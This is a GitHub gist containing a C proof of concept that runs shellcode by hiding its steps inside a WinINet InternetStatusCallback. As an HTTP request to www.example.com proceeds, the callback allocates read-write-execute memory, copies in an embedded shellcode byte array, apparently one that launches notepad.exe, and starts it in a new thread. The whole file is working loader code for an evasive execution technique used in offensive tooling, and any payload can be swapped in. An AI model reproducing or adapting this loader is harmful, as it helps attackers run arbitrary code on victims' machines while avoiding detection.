Created
August 21, 2025 22:51
-
-
Save whokilleddb/593e81f794809fb3498008aa39b7ff86 to your computer and use it in GitHub Desktop.
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, | |
| 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, | |
| 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, | |
| 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, | |
| 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, | |
| 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, | |
| 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, | |
| 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, | |
| 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, | |
| 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, | |
| 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, | |
| 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, | |
| 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, | |
| 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, | |
| 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70, | |
| 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00 | |
| }; | |
| DWORD shellcode_size = 0; | |
| LPVOID exec_addr = NULL; | |
| HANDLE hThread = NULL; | |
| // Status callback function | |
| void CALLBACK InternetStatusCallback( | |
| HINTERNET hInternet, | |
| DWORD_PTR dwContext, | |
| DWORD dwInternetStatus, | |
| LPVOID lpvStatusInformation, | |
| DWORD dwStatusInformationLength | |
| ) | |
| { | |
| switch (dwInternetStatus) | |
| { | |
| case INTERNET_STATUS_RESOLVING_NAME: | |
| if (lpvStatusInformation) printf("[+] Resolving name as:\t\t%S\n", (LPCWSTR)lpvStatusInformation); | |
| // calculate shellcode size | |
| shellcode_size = sizeof(shellcode); | |
| printf("[+] Shellcode size:\t\t%ld\n", shellcode_size); | |
| break; | |
| case INTERNET_STATUS_NAME_RESOLVED: | |
| if (lpvStatusInformation) printf("[+] Name resolved as:\t\t%s\n", (LPCSTR)lpvStatusInformation); | |
| // Create RWX memory | |
| exec_addr = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
| printf("[+] Allocated RWX memory to:\t0x%p\n", exec_addr); | |
| break; | |
| case INTERNET_STATUS_CONNECTING_TO_SERVER: | |
| printf("[+] Connecting to server\n"); | |
| memcpy(exec_addr, shellcode, shellcode_size); | |
| break; | |
| case INTERNET_STATUS_CONNECTED_TO_SERVER: | |
| if (lpvStatusInformation) printf("[+] Connected to server: %s\n", (LPCSTR)lpvStatusInformation); | |
| DWORD tid; | |
| CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_addr, NULL, 0, &tid); | |
| break; | |
| case INTERNET_STATUS_SENDING_REQUEST: | |
| printf("[+] Sending request to server\n"); | |
| break; | |
| case INTERNET_STATUS_REQUEST_SENT: | |
| printf("[+] Sent %ld bytes as request\n", *(DWORD*)lpvStatusInformation); | |
| CloseHandle(hThread); | |
| break; | |
| case INTERNET_STATUS_RECEIVING_RESPONSE: | |
| printf("[+] Receiving response from the server\n"); | |
| break; | |
| case INTERNET_STATUS_RESPONSE_RECEIVED: | |
| printf("[+] Received %ld bytes as response\n", *(DWORD*)lpvStatusInformation); | |
| break; | |
| case INTERNET_STATUS_REQUEST_COMPLETE: | |
| printf("[+] Request complete\n"); | |
| break; | |
| case INTERNET_STATUS_CLOSING_CONNECTION: | |
| printf("[+] Closing connection\n"); | |
| break; | |
| case INTERNET_STATUS_CONNECTION_CLOSED: | |
| printf("[+] Closed connection\n"); | |
| break; | |
| default: | |
| break; | |
| } | |
| } | |
| int main() | |
| { | |
| HINTERNET hInternet = NULL; | |
| HINTERNET hConnect = NULL; | |
| HINTERNET hRequest = NULL; | |
| // Initialize WinINet | |
| hInternet = InternetOpen( | |
| L"WinINet Status Callback Example/1.0", | |
| INTERNET_OPEN_TYPE_DIRECT, | |
| NULL, | |
| NULL, | |
| 0 | |
| ); | |
| if (!hInternet) | |
| { | |
| printf("[-] InternetOpen failed: 0x%lx\n", GetLastError()); | |
| return 1; | |
| } | |
| // Set the status callback | |
| INTERNET_STATUS_CALLBACK previousCallback = InternetSetStatusCallback( | |
| hInternet, | |
| InternetStatusCallback | |
| ); | |
| if (previousCallback == INTERNET_INVALID_STATUS_CALLBACK) | |
| { | |
| printf("[-] InternetSetStatusCallback failed: 0x%lx\n", GetLastError()); | |
| InternetCloseHandle(hInternet); | |
| return 1; | |
| } | |
| printf("[+] Status callback set successfully!\n"); | |
| // Connect to a server | |
| hConnect = InternetConnect( | |
| hInternet, | |
| L"www.example.com", | |
| INTERNET_DEFAULT_HTTP_PORT, | |
| NULL, | |
| NULL, | |
| INTERNET_SERVICE_HTTP, | |
| 0, | |
| 1 | |
| ); | |
| if (!hConnect) | |
| { | |
| printf("[-] InternetConnect failed: 0x%lx\n", GetLastError()); | |
| InternetCloseHandle(hInternet); | |
| return 1; | |
| } | |
| // Open an HTTP request | |
| hRequest = HttpOpenRequest( | |
| hConnect, | |
| L"GET", | |
| L"/", | |
| NULL, | |
| NULL, | |
| NULL, | |
| INTERNET_FLAG_RELOAD, | |
| 2 | |
| ); | |
| if (!hRequest) | |
| { | |
| printf("[-] HttpOpenRequest failed: 0x%lx\n", GetLastError()); | |
| InternetCloseHandle(hConnect); | |
| InternetCloseHandle(hInternet); | |
| return 1; | |
| } | |
| // Send the request | |
| if (HttpSendRequest(hRequest, NULL, 0,NULL, 0)) | |
| { | |
| // Read some response data | |
| printf("[+] Request sent successfully!\n"); | |
| char buffer[1024]; | |
| DWORD bytesRead = 0; | |
| InternetReadFile(hRequest, buffer, sizeof(buffer) - 1, &bytesRead); | |
| } | |
| else | |
| { | |
| printf("[-] HttpSendRequest failed: 0x%lx\n", GetLastError()); | |
| } | |
| // Clean up | |
| if (hRequest) InternetCloseHandle(hRequest); | |
| if (hConnect) InternetCloseHandle(hConnect); | |
| // Remove callback before closing the main handle | |
| InternetSetStatusCallback(hInternet, NULL); | |
| if (hInternet) InternetCloseHandle(hInternet); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment